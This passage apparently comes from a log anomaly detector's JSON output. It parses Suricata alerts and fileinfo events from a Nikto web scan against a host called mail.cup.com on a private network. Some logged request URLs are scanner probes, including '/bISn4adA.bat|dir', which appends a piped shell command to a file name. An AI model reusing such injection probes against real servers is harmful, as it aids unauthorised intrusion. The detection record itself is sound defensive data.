"\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1038059219636916, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80", "/parser/model/time": 1583349514.25285, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46866, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cellsprint", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.252999, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":384781809015003,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46866, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":384781809015003,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 384781809015003, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80", "/parser/model/time": 1583349514.254583, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46868, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bat|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.254803, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":911490828394343,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46868, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":911490828394343,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 911490828394343, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80", "/parser/model/time": 1583349514.257364, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46870, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.prf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.257763, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":648776268834898,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 